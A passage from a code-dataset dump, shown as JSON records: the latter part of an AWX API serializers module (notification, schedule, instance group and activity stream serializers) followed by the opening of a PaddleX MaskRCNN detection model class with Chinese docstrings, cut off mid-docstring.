serializers.ValidationError(errors)\n\n WFJT_extra_vars = template.extra_vars\n WFJT_inventory = template.inventory\n super(WorkflowJobLaunchSerializer, self).validate(attrs)\n template.extra_vars = WFJT_extra_vars\n template.inventory = WFJT_inventory\n return accepted\n\n\nclass NotificationTemplateSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete', 'copy']\n capabilities_prefetch = [{'copy': 'organization.admin'}]\n\n class Meta:\n model = NotificationTemplate\n fields = ('*', 'organization', 'notification_type', 'notification_configuration')\n\n type_map = {\"string\": (str,),\n \"int\": (int,),\n \"bool\": (bool,),\n \"list\": (list,),\n \"password\": (str,),\n \"object\": (dict, OrderedDict)}\n\n def to_representation(self, obj):\n ret = super(NotificationTemplateSerializer, self).to_representation(obj)\n if 'notification_configuration' in ret:\n ret['notification_configuration'] = obj.display_notification_configuration()\n return ret\n\n def get_related(self, obj):\n res = super(NotificationTemplateSerializer, self).get_related(obj)\n res.update(dict(\n test = self.reverse('api:notification_template_test', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:notification_template_notification_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:notification_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def _recent_notifications(self, obj):\n return [{'id': x.id, 'status': x.status, 'created': x.created} for x in obj.notifications.all().order_by('-created')[:5]]\n\n def get_summary_fields(self, obj):\n d = super(NotificationTemplateSerializer, self).get_summary_fields(obj)\n d['recent_notifications'] = self._recent_notifications(obj)\n return d\n\n def validate(self, attrs):\n from awx.api.views import NotificationTemplateDetail\n\n notification_type = None\n if 'notification_type' in attrs:\n notification_type = attrs['notification_type']\n elif self.instance:\n notification_type = self.instance.notification_type\n else:\n notification_type = None\n if not notification_type:\n raise serializers.ValidationError(_('Missing required fields for Notification Configuration: notification_type'))\n\n notification_class = NotificationTemplate.CLASS_FOR_NOTIFICATION_TYPE[notification_type]\n missing_fields = []\n incorrect_type_fields = []\n error_list = []\n if 'notification_configuration' not in attrs:\n return attrs\n if self.context['view'].kwargs and isinstance(self.context['view'], NotificationTemplateDetail):\n object_actual = self.context['view'].get_object()\n else:\n object_actual = None\n for field, params in notification_class.init_parameters.items():\n if field not in attrs['notification_configuration']:\n if 'default' in params:\n attrs['notification_configuration'][field] = params['default']\n else:\n missing_fields.append(field)\n continue\n field_val = attrs['notification_configuration'][field]\n field_type = params['type']\n expected_types = self.type_map[field_type]\n if not type(field_val) in expected_types:\n incorrect_type_fields.append((field, field_type))\n continue\n if field_type == \"list\" and len(field_val) < 1:\n error_list.append(_(\"No values specified for field '{}'\").format(field))\n continue\n if field_type == \"password\" and field_val == \"$encrypted$\" and object_actual is not None:\n attrs['notification_configuration'][field] = object_actual.notification_configuration[field]\n if missing_fields:\n error_list.append(_(\"Missing required fields for Notification Configuration: {}.\").format(missing_fields))\n if incorrect_type_fields:\n for type_field_error in incorrect_type_fields:\n error_list.append(_(\"Configuration field '{}' incorrect type, expected {}.\").format(type_field_error[0],\n type_field_error[1]))\n if error_list:\n raise serializers.ValidationError(error_list)\n return super(NotificationTemplateSerializer, self).validate(attrs)\n\n\nclass NotificationSerializer(BaseSerializer):\n\n class Meta:\n model = Notification\n fields = ('*', '-name', '-description', 'notification_template', 'error', 'status', 'notifications_sent',\n 'notification_type', 'recipients', 'subject')\n\n def get_related(self, obj):\n res = super(NotificationSerializer, self).get_related(obj)\n res.update(dict(\n notification_template = self.reverse('api:notification_template_detail', kwargs={'pk': obj.notification_template.pk}),\n ))\n return res\n\n\nclass LabelSerializer(BaseSerializer):\n\n class Meta:\n model = Label\n fields = ('*', '-description', 'organization')\n\n def get_related(self, obj):\n res = super(LabelSerializer, self).get_related(obj)\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n\nclass SchedulePreviewSerializer(BaseSerializer):\n\n class Meta:\n model = Schedule\n fields = ('rrule',)\n\n # We reject rrules if:\n # - DTSTART is not include\n # - INTERVAL is not included\n # - SECONDLY is used\n # - TZID is used\n # - BYDAY prefixed with a number (MO is good but not 20MO)\n # - BYYEARDAY\n # - BYWEEKNO\n # - Multiple DTSTART or RRULE elements\n # - Can't contain both COUNT and UNTIL\n # - COUNT > 999\n def validate_rrule(self, value):\n rrule_value = value\n multi_by_month_day = r\".*?BYMONTHDAY[\\:\\=][0-9]+,-*[0-9]+\"\n multi_by_month = r\".*?BYMONTH[\\:\\=][0-9]+,[0-9]+\"\n by_day_with_numeric_prefix = r\".*?BYDAY[\\:\\=][0-9]+[a-zA-Z]{2}\"\n match_count = re.match(r\".*?(COUNT\\=[0-9]+)\", rrule_value)\n match_multiple_dtstart = re.findall(r\".*?(DTSTART(;[^:]+)?\\:[0-9]+T[0-9]+Z?)\", rrule_value)\n match_native_dtstart = re.findall(r\".*?(DTSTART:[0-9]+T[0-9]+) \", rrule_value)\n match_multiple_rrule = re.findall(r\".*?(RRULE\\:)\", rrule_value)\n if not len(match_multiple_dtstart):\n raise serializers.ValidationError(_('Valid DTSTART required in rrule. Value should start with: DTSTART:YYYYMMDDTHHMMSSZ'))\n if len(match_native_dtstart):\n raise serializers.ValidationError(_('DTSTART cannot be a naive datetime. Specify ;TZINFO= or YYYYMMDDTHHMMSSZZ.'))\n if len(match_multiple_dtstart) > 1:\n raise serializers.ValidationError(_('Multiple DTSTART is not supported.'))\n if not len(match_multiple_rrule):\n raise serializers.ValidationError(_('RRULE required in rrule.'))\n if len(match_multiple_rrule) > 1:\n raise serializers.ValidationError(_('Multiple RRULE is not supported.'))\n if 'interval' not in rrule_value.lower():\n raise serializers.ValidationError(_('INTERVAL required in rrule.'))\n if 'secondly' in rrule_value.lower():\n raise serializers.ValidationError(_('SECONDLY is not supported.'))\n if re.match(multi_by_month_day, rrule_value):\n raise serializers.ValidationError(_('Multiple BYMONTHDAYs not supported.'))\n if re.match(multi_by_month, rrule_value):\n raise serializers.ValidationError(_('Multiple BYMONTHs not supported.'))\n if re.match(by_day_with_numeric_prefix, rrule_value):\n raise serializers.ValidationError(_(\"BYDAY with numeric prefix not supported.\"))\n if 'byyearday' in rrule_value.lower():\n raise serializers.ValidationError(_(\"BYYEARDAY not supported.\"))\n if 'byweekno' in rrule_value.lower():\n raise serializers.ValidationError(_(\"BYWEEKNO not supported.\"))\n if 'COUNT' in rrule_value and 'UNTIL' in rrule_value:\n raise serializers.ValidationError(_(\"RRULE may not contain both COUNT and UNTIL\"))\n if match_count:\n count_val = match_count.groups()[0].strip().split(\"=\")\n if int(count_val[1]) > 999:\n raise serializers.ValidationError(_(\"COUNT > 999 is unsupported.\"))\n try:\n Schedule.rrulestr(rrule_value)\n except Exception as e:\n raise serializers.ValidationError(_(\"rrule parsing failed validation: {}\").format(e))\n return value\n\n\nclass ScheduleSerializer(LaunchConfigurationBaseSerializer, SchedulePreviewSerializer):\n show_capabilities = ['edit', 'delete']\n\n timezone = serializers.SerializerMethodField()\n until = serializers.SerializerMethodField()\n\n class Meta:\n model = Schedule\n fields = ('*', 'unified_job_template', 'enabled', 'dtstart', 'dtend', 'rrule', 'next_run', 'timezone',\n 'until')\n\n def get_timezone(self, obj):\n return obj.timezone\n\n def get_until(self, obj):\n return obj.until\n\n def get_related(self, obj):\n res = super(ScheduleSerializer, self).get_related(obj)\n res.update(dict(\n unified_jobs = self.reverse('api:schedule_unified_jobs_list', kwargs={'pk': obj.pk}),\n ))\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n try:\n if obj.unified_job_template.project:\n res['project'] = obj.unified_job_template.project.get_absolute_url(self.context.get('request'))\n except ObjectDoesNotExist:\n pass\n if obj.inventory:\n res['inventory'] = obj.inventory.get_absolute_url(self.context.get('request'))\n elif obj.unified_job_template and getattr(obj.unified_job_template, 'inventory', None):\n res['inventory'] = obj.unified_job_template.inventory.get_absolute_url(self.context.get('request'))\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(ScheduleSerializer, self).get_summary_fields(obj)\n if 'inventory' in summary_fields:\n return summary_fields\n\n inventory = None\n if obj.unified_job_template and getattr(obj.unified_job_template, 'inventory', None):\n inventory = obj.unified_job_template.inventory\n else:\n return summary_fields\n\n summary_fields['inventory'] = dict()\n for field in SUMMARIZABLE_FK_FIELDS['inventory']:\n summary_fields['inventory'][field] = getattr(inventory, field, None)\n\n return summary_fields\n\n def validate_unified_job_template(self, value):\n if type(value) == InventorySource and value.source not in SCHEDULEABLE_PROVIDERS:\n raise serializers.ValidationError(_('Inventory Source must be a cloud resource.'))\n elif type(value) == Project and value.scm_type == '':\n raise serializers.ValidationError(_('Manual Project cannot have a schedule set.'))\n elif type(value) == InventorySource and value.source == 'scm' and value.update_on_project_update:\n raise serializers.ValidationError(_(\n 'Inventory sources with `update_on_project_update` cannot be scheduled. '\n 'Schedule its source project `{}` instead.'.format(value.source_project.name)))\n return value\n\n\nclass InstanceSerializer(BaseSerializer):\n\n consumed_capacity = serializers.SerializerMethodField()\n percent_capacity_remaining = serializers.SerializerMethodField()\n jobs_running = serializers.IntegerField(\n help_text=_('Count of jobs in the running or waiting state that '\n 'are targeted for this instance'),\n read_only=True\n )\n jobs_total = serializers.IntegerField(\n help_text=_('Count of all jobs that target this instance'),\n read_only=True\n )\n\n class Meta:\n model = Instance\n read_only_fields = ('uuid', 'hostname', 'version')\n fields = (\"id\", \"type\", \"url\", \"related\", \"uuid\", \"hostname\", \"created\", \"modified\", 'capacity_adjustment',\n \"version\", \"capacity\", \"consumed_capacity\", \"percent_capacity_remaining\", \"jobs_running\", \"jobs_total\",\n \"cpu\", \"memory\", \"cpu_capacity\", \"mem_capacity\", \"enabled\", \"managed_by_policy\")\n\n def get_related(self, obj):\n res = super(InstanceSerializer, self).get_related(obj)\n res['jobs'] = self.reverse('api:instance_unified_jobs_list', kwargs={'pk': obj.pk})\n res['instance_groups'] = self.reverse('api:instance_instance_groups_list', kwargs={'pk': obj.pk})\n return res\n\n def get_consumed_capacity(self, obj):\n return obj.consumed_capacity\n\n def get_percent_capacity_remaining(self, obj):\n if not obj.capacity or obj.consumed_capacity >= obj.capacity:\n return 0.0\n else:\n return float(\"{0:.2f}\".format(((float(obj.capacity) - float(obj.consumed_capacity)) / (float(obj.capacity))) * 100))\n\n\nclass InstanceGroupSerializer(BaseSerializer):\n\n committed_capacity = serializers.SerializerMethodField()\n consumed_capacity = serializers.SerializerMethodField()\n percent_capacity_remaining = serializers.SerializerMethodField()\n jobs_running = serializers.IntegerField(\n help_text=_('Count of jobs in the running or waiting state that '\n 'are targeted for this instance group'),\n read_only=True\n )\n jobs_total = serializers.IntegerField(\n help_text=_('Count of all jobs that target this instance group'),\n read_only=True\n )\n instances = serializers.SerializerMethodField()\n is_controller = serializers.BooleanField(\n help_text=_('Indicates whether instance group controls any other group'),\n read_only=True\n )\n is_isolated = serializers.BooleanField(\n help_text=_('Indicates whether instances in this group are isolated.'\n 'Isolated groups have a designated controller group.'),\n read_only=True\n )\n # NOTE: help_text is duplicated from field definitions, no obvious way of\n # both defining field details here and also getting the field's help_text\n policy_instance_percentage = serializers.IntegerField(\n default=0, min_value=0, max_value=100, required=False, initial=0,\n label=_('Policy Instance Percentage'),\n help_text=_(\"Minimum percentage of all instances that will be automatically assigned to \"\n \"this group when new instances come online.\")\n )\n policy_instance_minimum = serializers.IntegerField(\n default=0, min_value=0, required=False, initial=0,\n label=_('Policy Instance Minimum'),\n help_text=_(\"Static minimum number of Instances that will be automatically assign to \"\n \"this group when new instances come online.\")\n )\n policy_instance_list = serializers.ListField(\n child=serializers.CharField(), required=False,\n label=_('Policy Instance List'),\n help_text=_(\"List of exact-match Instances that will be assigned to this group\")\n )\n\n class Meta:\n model = InstanceGroup\n fields = (\"id\", \"type\", \"url\", \"related\", \"name\", \"created\", \"modified\",\n \"capacity\", \"committed_capacity\", \"consumed_capacity\",\n \"percent_capacity_remaining\", \"jobs_running\", \"jobs_total\",\n \"instances\", \"controller\", \"is_controller\", \"is_isolated\",\n \"policy_instance_percentage\", \"policy_instance_minimum\", \"policy_instance_list\")\n\n def get_related(self, obj):\n res = super(InstanceGroupSerializer, self).get_related(obj)\n res['jobs'] = self.reverse('api:instance_group_unified_jobs_list', kwargs={'pk': obj.pk})\n res['instances'] = self.reverse('api:instance_group_instance_list', kwargs={'pk': obj.pk})\n if obj.controller_id:\n res['controller'] = self.reverse('api:instance_group_detail', kwargs={'pk': obj.controller_id})\n return res\n\n def validate_policy_instance_list(self, value):\n for instance_name in value:\n if value.count(instance_name) > 1:\n raise serializers.ValidationError(_('Duplicate entry {}.').format(instance_name))\n if not Instance.objects.filter(hostname=instance_name).exists():\n raise serializers.ValidationError(_('{} is not a valid hostname of an existing instance.').format(instance_name))\n if Instance.objects.get(hostname=instance_name).is_isolated():\n raise serializers.ValidationError(_('Isolated instances may not be added or removed from instances groups via the API.'))\n if self.instance and self.instance.controller_id is not None:\n raise serializers.ValidationError(_('Isolated instance group membership may not be managed via the API.'))\n return value\n\n def validate_name(self, value):\n if self.instance and self.instance.name == 'tower' and value != 'tower':\n raise serializers.ValidationError(_('tower instance group name may not be changed.'))\n return value\n\n def get_capacity_dict(self):\n # Store capacity values (globally computed) in the context\n if 'capacity_map' not in self.context:\n ig_qs = None\n jobs_qs = UnifiedJob.objects.filter(status__in=('running', 'waiting'))\n if self.parent: # Is ListView:\n ig_qs = self.parent.instance\n self.context['capacity_map'] = InstanceGroup.objects.capacity_values(\n qs=ig_qs, tasks=jobs_qs, breakdown=True)\n return self.context['capacity_map']\n\n def get_consumed_capacity(self, obj):\n return self.get_capacity_dict()[obj.name]['running_capacity']\n\n def get_committed_capacity(self, obj):\n return self.get_capacity_dict()[obj.name]['committed_capacity']\n\n def get_percent_capacity_remaining(self, obj):\n if not obj.capacity:\n return 0.0\n consumed = self.get_consumed_capacity(obj)\n if consumed >= obj.capacity:\n return 0.0\n else:\n return float(\"{0:.2f}\".format(\n ((float(obj.capacity) - float(consumed)) / (float(obj.capacity))) * 100)\n )\n\n def get_instances(self, obj):\n return obj.instances.count()\n\n\nclass ActivityStreamSerializer(BaseSerializer):\n\n changes = serializers.SerializerMethodField()\n object_association = serializers.SerializerMethodField(\n help_text=_(\"When present, shows the field name of the role or relationship that changed.\"))\n object_type = serializers.SerializerMethodField(\n help_text=_(\"When present, shows the model on which the role or relationship was defined.\"))\n\n @cached_property\n def _local_summarizable_fk_fields(self):\n summary_dict = copy.copy(SUMMARIZABLE_FK_FIELDS)\n # Special requests\n summary_dict['group'] = summary_dict['group'] + ('inventory_id',)\n for key in summary_dict.keys():\n if 'id' not in summary_dict[key]:\n summary_dict[key] = summary_dict[key] + ('id',)\n field_list = list(summary_dict.items())\n # Needed related fields that are not in the default summary fields\n field_list += [\n ('workflow_job_template_node', ('id', 'unified_job_template_id')),\n ('label', ('id', 'name', 'organization_id')),\n ('notification', ('id', 'status', 'notification_type', 'notification_template_id')),\n ('o_auth2_access_token', ('id', 'user_id', 'description', 'application_id', 'scope')),\n ('o_auth2_application', ('id', 'name', 'description')),\n ('credential_type', ('id', 'name', 'description', 'kind', 'managed_by_tower')),\n ('ad_hoc_command', ('id', 'name', 'status', 'limit'))\n ]\n return field_list\n\n class Meta:\n model = ActivityStream\n fields = ('*', '-name', '-description', '-created', '-modified', 'timestamp', 'operation',\n 'changes', 'object1', 'object2', 'object_association', 'action_node', 'object_type')\n\n def get_fields(self):\n ret = super(ActivityStreamSerializer, self).get_fields()\n for key, field in list(ret.items()):\n if key == 'changes':\n field.help_text = _('A summary of the new and changed values when an object is created, updated, or deleted')\n if key == 'object1':\n field.help_text = _('For create, update, and delete events this is the object type that was affected. '\n 'For associate and disassociate events this is the object type associated or disassociated with object2.')\n if key == 'object2':\n field.help_text = _('Unpopulated for create, update, and delete events. For associate and disassociate '\n 'events this is the object type that object1 is being associated with.')\n if key == 'operation':\n field.help_text = _('The action taken with respect to the given object(s).')\n return ret\n\n def get_changes(self, obj):\n if obj is None:\n return {}\n try:\n return json.loads(obj.changes)\n except Exception:\n logger.warn(\"Error deserializing activity stream json changes\")\n return {}\n\n def get_object_association(self, obj):\n if not obj.object_relationship_type:\n return \"\"\n elif obj.object_relationship_type.endswith('_role'):\n # roles: these values look like\n # \"awx.main.models.inventory.Inventory.admin_role\"\n # due to historical reasons the UI expects just \"role\" here\n return \"role\"\n # default case: these values look like\n # \"awx.main.models.organization.Organization_notification_templates_success\"\n # so instead of splitting on period we have to take after the first underscore\n try:\n return obj.object_relationship_type.split(\".\")[-1].split(\"_\", 1)[1]\n except Exception:\n logger.debug('Failed to parse activity stream relationship type {}'.format(obj.object_relationship_type))\n return \"\"\n\n def get_object_type(self, obj):\n if not obj.object_relationship_type:\n return \"\"\n elif obj.object_relationship_type.endswith('_role'):\n return camelcase_to_underscore(obj.object_relationship_type.rsplit('.', 2)[-2])\n # default case: these values look like\n # \"awx.main.models.organization.Organization_notification_templates_success\"\n # so we have to take after the last period but before the first underscore.\n try:\n cls = obj.object_relationship_type.rsplit('.', 1)[0]\n return camelcase_to_underscore(cls.split('_', 1))\n except Exception:\n logger.debug('Failed to parse activity stream relationship type {}'.format(obj.object_relationship_type))\n return \"\"\n\n def get_related(self, obj):\n rel = {}\n if obj.actor is not None:\n rel['actor'] = self.reverse('api:user_detail', kwargs={'pk': obj.actor.pk})\n for fk, __ in self._local_summarizable_fk_fields:\n if not hasattr(obj, fk):\n continue\n m2m_list = self._get_rel(obj, fk)\n if m2m_list:\n rel[fk] = []\n id_list = []\n for thisItem in m2m_list:\n if getattr(thisItem, 'id', None) in id_list:\n continue\n id_list.append(getattr(thisItem, 'id', None))\n if hasattr(thisItem, 'get_absolute_url'):\n rel_url = thisItem.get_absolute_url(self.context.get('request'))\n else:\n view_name = fk + '_detail'\n rel_url = self.reverse('api:' + view_name, kwargs={'pk': thisItem.id})\n rel[fk].append(rel_url)\n\n if fk == 'schedule':\n rel['unified_job_template'] = thisItem.unified_job_template.get_absolute_url(self.context.get('request'))\n if obj.setting and obj.setting.get('category', None):\n rel['setting'] = self.reverse(\n 'api:setting_singleton_detail',\n kwargs={'category_slug': obj.setting['category']}\n )\n return rel\n\n def _get_rel(self, obj, fk):\n related_model = ActivityStream._meta.get_field(fk).related_model\n related_manager = getattr(obj, fk)\n if issubclass(related_model, PolymorphicModel) and hasattr(obj, '_prefetched_objects_cache'):\n # HACK: manually fill PolymorphicModel caches to prevent running query multiple times\n # unnecessary if django-polymorphic issue #68 is solved\n if related_manager.prefetch_cache_name not in obj._prefetched_objects_cache:\n obj._prefetched_objects_cache[related_manager.prefetch_cache_name] = list(related_manager.all())\n return related_manager.all()\n\n def get_summary_fields(self, obj):\n summary_fields = OrderedDict()\n for fk, related_fields in self._local_summarizable_fk_fields:\n try:\n if not hasattr(obj, fk):\n continue\n m2m_list = self._get_rel(obj, fk)\n if m2m_list:\n summary_fields[fk] = []\n for thisItem in m2m_list:\n if fk == 'job':\n summary_fields['job_template'] = []\n job_template_item = {}\n job_template_fields = SUMMARIZABLE_FK_FIELDS['job_template']\n job_template = getattr(thisItem, 'job_template', None)\n if job_template is not None:\n for field in job_template_fields:\n fval = getattr(job_template, field, None)\n if fval is not None:\n job_template_item[field] = fval\n summary_fields['job_template'].append(job_template_item)\n if fk == 'workflow_job_template_node':\n summary_fields['workflow_job_template'] = []\n workflow_job_template_item = {}\n workflow_job_template_fields = SUMMARIZABLE_FK_FIELDS['workflow_job_template']\n workflow_job_template = getattr(thisItem, 'workflow_job_template', None)\n if workflow_job_template is not None:\n for field in workflow_job_template_fields:\n fval = getattr(workflow_job_template, field, None)\n if fval is not None:\n workflow_job_template_item[field] = fval\n summary_fields['workflow_job_template'].append(workflow_job_template_item)\n if fk == 'schedule':\n unified_job_template = getattr(thisItem, 'unified_job_template', None)\n if unified_job_template is not None:\n summary_fields[get_type_for_model(unified_job_template)] = {'id': unified_job_template.id,\n 'name': unified_job_template.name}\n thisItemDict = {}\n for field in related_fields:\n fval = getattr(thisItem, field, None)\n if fval is not None:\n thisItemDict[field] = fval\n summary_fields[fk].append(thisItemDict)\n except ObjectDoesNotExist:\n pass\n if obj.actor is not None:\n summary_fields['actor'] = dict(id = obj.actor.id,\n username = obj.actor.username,\n first_name = obj.actor.first_name,\n last_name = obj.actor.last_name)\n elif obj.deleted_actor:\n summary_fields['actor'] = obj.deleted_actor.copy()\n summary_fields['actor']['id'] = None\n if obj.setting:\n summary_fields['setting'] = [obj.setting]\n return summary_fields\n"} {"ext": "py", "sha": "1a2eab502e8edeb022d083bfdb0d6b42b5363cba", "content": "# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nimport math\nimport tqdm\nimport numpy as np\nfrom multiprocessing.pool import ThreadPool\nimport paddle.fluid as fluid\nimport paddlex.utils.logging as logging\nimport paddlex\nimport copy\nimport os.path as osp\nfrom paddlex.cv.transforms import arrange_transforms\nfrom collections import OrderedDict\nfrom .faster_rcnn import FasterRCNN\nfrom .utils.detection_eval import eval_results, bbox2out, mask2out\n\n\nclass MaskRCNN(FasterRCNN):\n \"\"\"构建MaskRCNN,并实现其训练、评估、预测和模型导出。\n\n Args:\n num_classes (int): 包含了背景类的类别数。默认为81。\n backbone (str): MaskRCNN的backbone网络,取值范围为['ResNet18', 'ResNet50',\n 'ResNet50_vd', 'ResNet101', 'ResNet101_vd', 'HRNet_W18']。默认为'ResNet50'。\n with_fpn (bool): 是否使用FPN结构。默认为True。\n aspect_ratios (list): 生成anchor高宽比的可选值。默认为[0.5, 1.0, 2.0]。\n anchor_sizes (list): 生成anchor大小的可选值。默认为[32, 64, 128, 256, 512]。\n input_channel (int): 输入图像的通道数量。默认为3。\n \"\"\"\n\n def __init__(self,\n num_classes=81,\n backbone='ResNet50',\n with_fpn=True,\n aspect_ratios=[0.5, 1.0, 2.0],\n anchor_sizes=[32, 64, 128, 256, 512],\n input_channel=3):\n self.init_params = locals()\n backbones = [\n 'ResNet18', 'ResNet50', 'ResNet50_vd', 'ResNet101', 'ResNet101_vd',\n 'HRNet_W18'\n ]\n assert backbone in backbones, \"backbone should be one of {}\".format(\n backbones)\n super(FasterRCNN, self).__init__('detector')\n self.backbone = backbone\n self.num_classes = num_classes\n self.with_fpn = with_fpn\n self.anchor_sizes = anchor_sizes\n self.labels = None\n if with_fpn:\n self.mask_head_resolution = 28\n else:\n self.mask_head_resolution = 14\n self.fixed_input_shape = None\n self.input_channel = input_channel\n self.with_dcn = False\n\n def build_net(self, mode='train'):\n train_pre_nms_top_n = 2000 if self.with_fpn else 12000\n test_pre_nms_top_n = 1000 if self.with_fpn else 6000\n num_convs = 4 if self.with_fpn else 0\n model = paddlex.cv.nets.detection.MaskRCNN(\n backbone=self._get_backbone(self.backbone),\n num_classes=self.num_classes,\n mode=mode,\n with_fpn=self.with_fpn,\n train_pre_nms_top_n=train_pre_nms_top_n,\n test_pre_nms_top_n=test_pre_nms_top_n,\n num_convs=num_convs,\n mask_head_resolution=self.mask_head_resolution,\n fixed_input_shape=self.fixed_input_shape,\n input_channel=self.input_channel)\n inputs = model.generate_inputs()\n if mode == 'train':\n model_out = model.build_net(inputs)\n loss = model_out['loss']\n self.optimizer.minimize(loss)\n outputs = OrderedDict(\n [('loss', model_out['loss']),\n ('loss_cls', model_out['loss_cls']),\n ('loss_bbox', model_out['loss_bbox']),\n ('loss_mask', model_out['loss_mask']),\n ('loss_rpn_cls', model_out['loss_rpn_cls']), (\n 'loss_rpn_bbox', model_out['loss_rpn_bbox'])])\n else:\n outputs = model.build_net(inputs)\n return inputs, outputs\n\n def default_optimizer(self, learning_rate, warmup_steps, warmup_start_lr,\n lr_decay_epochs, lr_decay_gamma,\n num_steps_each_epoch):\n if warmup_steps > lr_decay_epochs[0] * num_steps_each_epoch:\n logging.error(\n \"In function train(), parameters should satisfy: warmup_steps <= lr_decay_epochs[0]*num_samples_in_train_dataset\",\n exit=False)\n logging.error(\n \"See this doc for more information: https://github.com/PaddlePaddle/PaddleX/blob/develop/docs/appendix/parameters.md#notice\",\n exit=False)\n logging.error(\n \"warmup_steps should less than {} or lr_decay_epochs[0] greater than {}, please modify 'lr_decay_epochs' or 'warmup_steps' in train function\".\n format(lr_decay_epochs[0] * num_steps_each_epoch, warmup_steps\n // num_steps_each_epoch))\n boundaries = [b * num_steps_each_epoch for b in lr_decay_epochs]\n values = [(lr_decay_gamma**i) * learning_rate\n for i in range(len(lr_decay_epochs) + 1)]\n lr_decay = fluid.layers.piecewise_decay(\n boundaries=boundaries, values=values)\n lr_warmup = fluid.layers.linear_lr_warmup(\n learning_rate=lr_decay,\n warmup_steps=warmup_steps,\n start_lr=warmup_start_lr,\n end_lr=learning_rate)\n optimizer = fluid.optimizer.Momentum(\n learning_rate=lr_warmup,\n momentum=0.9,\n regularization=fluid.regularizer.L2Decay(1e-04))\n return optimizer\n\n def train(self,\n num_epochs,\n train_dataset,\n train_batch_size=1,\n eval_dataset=None,\n save_interval_epochs=1,\n log_interval_steps=2,\n save_dir='output',\n pretrain_weights='IMAGENET',\n optimizer=None,\n learning_rate=1.0 / 800,\n warmup_steps=500,\n warmup_start_lr=1.0 / 2400,\n lr_decay_epochs=[8, 11],\n lr_decay_gamma=0.1,\n metric=None,\n use_vdl=False,\n early_stop=False,\n early_stop_patience=5,\n resume_checkpoint=None):\n \"\"\"训练。\n\n Args:\n num_epochs (int): 训练迭代轮数。\n train_dataset (paddlex.datasets): 训练数据读取器。\n train_batch_size (int): 训练或验证数据batch大小。目前检测仅支持单卡评估,训练数据batch大小与\n 显卡数量之商为验证数据batch大小。默认值为1。\n eval_dataset (paddlex.datasets): 验证数据读取器。\n save_interval_epochs (int): 模型保存间隔(单位:迭代轮数)。默认为1。\n log_interval_steps (int): 训练日志输出间隔(单位:迭代次数)。默认为20。\n save_dir (str): 模型保存路径。默认值为'output'。\n pretrain_weights (str): 若指定为路径时,则加载路径下预训练模型;若为字符串'IMAGENET',\n 则自动下载在ImageNet图片数据上预训练的模型权重;若为字符串'COCO',\n 则自动下载在COCO数据集上预训练的模型权重;若为None,则不使用预训练模型。默认为None。\n optimizer (paddle.fluid.optimizer): 优化器。当该参数为None时,使用默认优化器:\n fluid.layers.piecewise_decay衰减策略,fluid.optimizer.Momentum优化方法。\n learning_rate (float): 默认优化器的学习率。默认为1.0/800。\n warmup_steps (int): 默认优化器进行warmup过程的步数。默认为500。\n warmup_start_lr (int): 默认优化器warmup的起始学习率。默认为1.0/2400。\n lr_decay_epochs (list): 默认优化器的学习率衰减轮数。默认为[8, 11]。\n lr_decay_gamma (float): 默认优化器的学习率衰减率。默认为0.1。\n metric (bool): 训练过程中评估的方式,取值范围为['COCO', 'VOC']。\n use_vdl (bool): 是否使用VisualDL进行可视化。默认值为False。\n early_stop (bool): 是否使用提前终止训练策略。默认值为False。\n early_stop_patience (int): 当使用提前终止训练策略时,如果验证集精度在`early_stop_patience`个epoch内\n 连续下降或持平,则终止训练。默认值为5。\n resume_checkpoint (str): 恢复训练时指定上次训练保存的模型路径。若为None,则不会恢复训练。默认值为None。\n\n Raises:\n ValueError: 评估类型不在指定列表中。\n ValueError: 模型从inference model进行加载。\n \"\"\"\n if metric is None:\n if isinstance(train_dataset, paddlex.datasets.CocoDetection) or \\\n isinstance(train_dataset, paddlex.datasets.EasyDataDet):\n metric = 'COCO'\n else:\n raise Exception(\n \"train_dataset should be datasets.COCODetection or datasets.EasyDataDet.\"\n )\n assert metric in ['COCO', 'VOC'], \"Metric only support 'VOC' or 'COCO'\"\n self.metric = metric\n if not self.trainable:\n raise Exception(\"Model is not trainable from load_model method.\")\n self.labels = copy.deepcopy(train_dataset.labels)\n self.labels.insert(0, 'background')\n # 构建训练网络\n if optimizer is None:\n # 构建默认的优化策略\n num_steps_each_epoch = train_dataset.num_samples // train_batch_size\n optimizer = self.default_optimizer(\n learning_rate=learning_rate,\n warmup_steps=warmup_steps,\n warmup_start_lr=warmup_start_lr,\n lr_decay_epochs=lr_decay_epochs,\n lr_decay_gamma=lr_decay_gamma,\n num_steps_each_epoch=num_steps_each_epoch)\n self.optimizer = optimizer\n # 构建训练、验证、测试网络\n self.build_program()\n fuse_bn = True\n if self.with_fpn and self.backbone in [\n 'ResNet18', 'ResNet50', 'HRNet_W18'\n ]:\n fuse_bn = False\n self.net_initialize(\n startup_prog=fluid.default_startup_program(),\n pretrain_weights=pretrain_weights,\n fuse_bn=fuse_bn,\n save_dir=save_dir,\n resume_checkpoint=resume_checkpoint)\n # 训练\n self.train_loop(\n num_epochs=num_epochs,\n train_dataset=train_dataset,\n train_batch_size=train_batch_size,\n eval_dataset=eval_dataset,\n save_interval_epochs=save_interval_epochs,\n log_interval_steps=log_interval_steps,\n save_dir=save_dir,\n use_vdl=use_vdl,\n early_stop=early_stop,\n early_stop_patience=early_stop_patience)\n\n def evaluate(self,\n eval_dataset,\n batch_size=1,\n epoch_id=None,\n metric=None,\n return_details=False):\n \"\"\"评估。\n\n Args:\n eval_dataset (paddlex.datasets): 验证数据读取器。\n batch_size (int): 验证数据批大小。默认为1。当前只支持设置为1。\n epoch_id (int): 当前评估模型所在的训练轮数。\n metric (bool): 训练过程中评估的方式,取值范围为['COCO', 